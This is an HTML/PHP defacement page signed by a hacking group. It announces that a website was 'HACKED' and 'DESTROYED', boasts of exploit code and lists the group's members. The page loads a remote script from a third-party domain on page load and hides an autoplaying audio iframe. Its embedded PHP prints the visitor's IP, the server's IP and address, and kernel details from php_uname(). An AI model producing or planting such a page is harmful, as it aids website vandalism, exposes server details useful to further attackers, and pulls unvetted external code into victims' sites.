<!DOCTYPE HTML>
<html>
<head>

<!-- Rapih Ya Gan ? :v -->
<!-- Author By : ./FUKUR0-3XP -->
<!-- Created Date : 19 November 2019 -->
<!-- Nama Author Jangan Di Hapus Atau Di Ganti Ya Sayang :')  -->
<!-- Capek Loh Buatnya :') -->
	
<title>
HACKED BY ./FUKUR0-3XP
</title>

<meta property="og:description" content="SILENT TO GET">
<meta property="og:url" content="http://black-coders.space">
<meta property="og:title" content="HACKED BY ./FUKUR0-3XP">
<meta property="og:image" content="https://i.ibb.co/d2MMwWM/IMG-20191119-152535-106.jpg">

<style type="text/css">

@import url(https://fonts.googleapis.com/css?family=Kelly+Slab);

body {
	text-align: center;
	background-color: #000022;
} 
hacked {
	color: #ffffff;
	font-size: 30px;
	font-weight: bold;
	font-family: 'Kelly Slab';
	-webkit-text-stroke: 0.05em #21deff;
} 
team {
	color: #f0fcff;
	font-size: 25px;
	font-family: 'Kelly Slab';
	font-weight: bold;
	-webkit-text-stroke: 0.06em #29bee3;
}
judul {
	color: #ffffff;
	font-size: 25px;
	font-weight: bold;
	font-family: 'Kelly Slab';
	-webkit-text-stroke: 0.05em #21deff;
}
isi {
color: #ffffff;
font-size: 25px;
font-weight: bold;
font-family: 'Kelly Slab';
-webkit-text-stroke: 0.05em #4ac6f0;
}
mem {
color: #ffffff;
font-size: 25px;
font-weight: bold;
font-family: 'Kelly Slab';
-webkit-text-stroke: 0.05em #4ac6f0;
} 
memr {
color: #ffffff;
font-size: 20px;
font-weight: bold;
font-family: 'Kelly Slab';
-webkit-text-stroke: 0.05em #4ac6f0;
}
b {
color: #ffffff;
font-size: 25px;
font-weight: bold;
font-family: 'Kelly Slab';
-webkit-text-stroke: 0.05em #2a647a;
}
cpr {
color: #ffffff;
font-size: 25px;
font-weight: bold;
font-family: 'Kelly Slab';
-webkit-text-stroke: 0.05em #4ac6f0;
} 
  #txt {
color: #ffffff;
font-size: 25px;
font-weight: bold;
font-family: 'Kelly Slab';
-webkit-text-stroke: 0.05em #4ac6f0;
-webkit-animation-name: blinker;
-webkit-animation-duration: 1s;
-webkit-animation-timing-function: linear;
-webkit-animation-iteration-count: infinite; 
-moz-animation-name: blinker;
-moz-animation-duration: 1s;
-moz-animation-timing-function: linear;
-moz-animation-iteration-count: infinite;

 animation-name: blinker;
 animation-duration: 1s;
 animation-timing-function: linear;
 animation-iteration-count: infinite;
}

@-moz-keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 }

@-webkit-keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 }

@keyframes blinker {  
 0% { opacity: 1.0; }
 50% { opacity: 0.0; }
 100% { opacity: 1.0; }
 
</style>

<script src="https://keysemi.com/cache/shortcodes/fukur0-snow.js" type="text/javascript"></script>

</head>

<body>

<pre>

<center><img src="https://i.ibb.co/QF0pzLQ/20191120-194433.png" width="400px"></center><br>

<hacked> HACKED BY ./FUKUR0-3XP </hacked><br><br>
<team> - BLACK CODERS ANONYMOUS SATANIC EXPLOITER TEAM - </team><br><br><br><br>

<judul> -: MESSAGES :-</judul><br><br>
<div id="txt"> --> PATCH BUGS IMMEDIATELY ON YOUR WEBSITE <-- </div><br>
<div id="txt"> SORRY WE DESTROYED YOUR WEBSITE, FIX IT IMMEDIATELY</div><br><br><br>

<judul> -: SLOGANS :- </judul><br><br>
<isi> WE ARE GHOST IN CYBER SPACE, SILENT BUT DEADLY <br>AND THIS EXPLOIT CODE WILL SHUT YOU DOWN</isi><br><br><br><br>

<judul> -: OFFICIAL MEMBER :- </judul><br>
<div id="txt">
<mem> MR-X666X <b>//</b> ./K1TSUN3-6H05T <b>//</b> DARKNET-RUDY <b>//</b> AUTHENTIC-GHOST97<br>D4FF4 <b>//</b> BR1NG4S <b>//</b> SEA-GHOST <b>//</b> CHAPPIE <b>//</b> RASCAL <b>//</b> ./FUKUR0-3XP<br>GHOST666 <b>//</b> Z3ROH1D3N <b>//</b> RAVINKUN@GHOST <b>//</b> R666HOST <b>//</b> NOXLAW <br>TN.KAL1B3R <b>//</b> MR-KANCIL <b>//</b> DEVILS'KENSHI <b>//</b> ./FINIX <b>//</b> MUGIWARA<br> DARKWEBSTER <b>//</b> BABY_CODE <b>//</b> RAMIL-FEYZIYEV <b>//</b> CAPTAIN_MAXI<br> VENOM-GHOST <b>//</b> QUEEN-GHOST <b>//</b> MILEA24 <b>//</b> QUEENRA <b>//</b> DS7 <br> C4PUNG-X6X <b>//</b> VIN|303 <b>//</b> CILOT_ <b>//</b> MR-KIMCIL <b>//</b> DARK-SKY <br>RAHUL <b>//</b> DENI-GANZ <b>//</b> LEAD-SAYNO <b>//</b> ./KAIZ3N-6H05T<br><br></div><mem>:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:_:</mem><br><br><br><br>
	
<cpr> COPYRIGHT &COPY; 2K19 POWERED BY ./FUKUR0-3XP</cpr>

<iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://api.soundcloud.com/tracks/688506091/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" ></iframe>

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$server = $_SERVER['SERVER_NAME'];
$kunjung = $_SERVER['REQUEST_URI'];
$webip = $_SERVER['SERVER_ADDR'];
$kernel_sys = php_uname();
?>
	
<mem>YOUR IP : <? print $ip; ?> </mem>
<mem>IP WEBSITE : <? print $webip; ?> </mem>
<mem>URL VISITED  : <? print $server . $kunjung; ?> </mem><br><br>
<mem>-: SYSTEM WEBSITE :- </mem><br>
</pre>
<memr><? print $kernel_sys; ?></memr>

</body>
</html>
